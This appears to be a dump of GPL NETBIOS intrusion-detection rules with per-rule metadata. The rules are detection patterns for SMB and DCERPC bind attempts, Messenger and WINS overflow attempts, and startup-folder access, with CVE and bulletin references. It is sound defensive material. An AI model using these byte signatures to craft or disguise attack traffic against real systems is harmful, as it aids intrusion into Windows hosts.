alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103175; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103214

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103214; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103215

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103215; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103216

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103216; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103217

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103217; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103196

#alert udp $EXTERNAL_NET any -> $HOME_NET 137 (msg:"GPL NETBIOS name query overflow attempt UDP"; byte_test:1,&,64,2; content:" "; offset:12; isdataat:56,relative; reference:bugtraq,9624; reference:cve,2003-0825; classtype:attempted-admin; sid:2103196; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : name query overflow attempt UDP

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9624|cve,2003-0825

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103200

#alert udp $EXTERNAL_NET any -> $HOME_NET 42 (msg:"GPL NETBIOS WINS name query overflow attempt UDP"; byte_test:1,&,64,2; content:" "; offset:12; isdataat:56,relative; reference:bugtraq,9624; reference:cve,2003-0825; reference:url,www.microsoft.com/technet/security/bulletin/MS04-006.mspx; classtype:attempted-admin; sid:2103200; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : WINS name query overflow attempt UDP

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9624|cve,2003-0825|url,www.microsoft.com/technet/security/bulletin/MS04-006.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103235

#alert udp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS Messenger message overflow attempt"; content:"|04 00|"; depth:2; byte_test:1,!&,16,2,relative; content:"|F8 91|{Z|00 FF D0 11 A9 B2 00 C0|O|B6 E6 FC|"; within:16; distance:22; content:"|00 00|"; within:2; distance:28; byte_jump:4,18,align,relative; byte_jump:4,8,align,relative; byte_test:4,>,1024,8,relative; reference:bugtraq,8826; reference:cve,2003-0717; classtype:attempted-admin; sid:2103235; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : Messenger message overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103234

#alert udp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS Messenger message little endian overflow attempt"; content:"|04 00|"; depth:2; byte_test:1,&,16,2,relative; content:"|F8 91|{Z|00 FF D0 11 A9 B2 00 C0|O|B6 E6 FC|"; within:16; distance:22; content:"|00 00|"; within:2; distance:28; byte_jump:4,18,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,8,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; classtype:attempted-admin; sid:2103234; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : Messenger message little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102349

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC enumerate printers request attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; fast_pattern; within:12; distance:5; nocase; content:"|05|"; distance:1; content:"|00|"; within:1; distance:1; byte_test:1,&,3,0,relative; content:"|00 00|"; within:2; distance:19; flowbits:isset,dce.printer.bind; classtype:attempted-recon; sid:2102349; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC enumerate printers request attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102348

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC print spool bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00 05 00 0B|"; within:17; distance:5; byte_test:1,&,16,1,relative; content:"xV4|12|4|12 CD AB EF 00 01 23|Eg|89 AB|"; within:16; distance:29; flowbits:set,dce.printer.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2102348; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC print spool bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102316

alert udp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"GPL NETBIOS DCERPC Workstation Service direct service access attempt"; content:"|04 00|"; depth:2; byte_test:1,&,16,2,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:22; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102316; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Workstation Service direct service access attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102315

alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"GPL NETBIOS DCERPC Workstation Service direct service bind attempt"; flow:to_server,established; content:"|05 00 0B|"; depth:3; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102315; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Workstation Service direct service bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102311

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102311; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Workstation Service bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102310

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102310; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Workstation Service unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102309

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC Workstation Service bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102309; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC Workstation Service bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102308

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC Workstation Service unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102308; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC Workstation Service unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102258

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|04 00|"; within:2; byte_test:1,>,15,2,relative; byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; reference:nessus,11888; reference:nessus,11890; reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx; classtype:attempted-admin; sid:2102258; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Messenger Service buffer overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717|nessus,11888|nessus,11890|url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102257

alert udp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Messenger Service buffer overflow attempt"; content:"|04 00|"; depth:2; byte_test:1,>,15,2,relative; byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; reference:nessus,11888; reference:nessus,11890; reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx; classtype:attempted-admin; sid:2102257; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Messenger Service buffer overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717|nessus,11888|nessus,11890|url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102252

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102252; rev:15; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Remote Activation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8234|bugtraq,8458|cve,2003-0528|cve,2003-0605|cve,2003-0715|nessus,11798|nessus,11835|url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 15

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102251

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Remote Activation bind attempt"; flow:to_server,established; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102251; rev:16; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Remote Activation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8234|bugtraq,8458|cve,2003-0528|cve,2003-0605|cve,2003-0715|nessus,11798|nessus,11835|url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 16

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102193

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind.call.attempt; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2102193; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102192

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind.attempt; flowbits:noalert; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2102192; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102191

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB DCERPC invalid bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|00|"; within:1; distance:21; classtype:attempted-dos; sid:2102191; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC invalid bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102190

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC invalid bind attempt"; flow:to_server,established; content:"|05|"; depth:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|00|"; within:1; distance:21; classtype:attempted-dos; sid:2102190; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC invalid bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102177

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB startup folder unicode access"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|5C 00|S|00|t|00|a|00|r|00|t|00| |00|M|00|e|00|n|00|u|00 5C 00|P|00|r|00|o|00|g|00|r|00|a|00|m|00|s|00 5C 00|S|00|t|00|a|00|r|00|t|00|u|00|p"; distance:0; nocase; classtype:attempted-recon; sid:2102177; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB startup folder unicode access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102176

alert tcp any any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB startup folder access"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"Documents and Settings|5C|All Users|5C|Start Menu|5C|Programs|5C|Startup|00|"; distance:0; nocase; classtype:attempted-recon; sid:2102176; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB startup folder access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

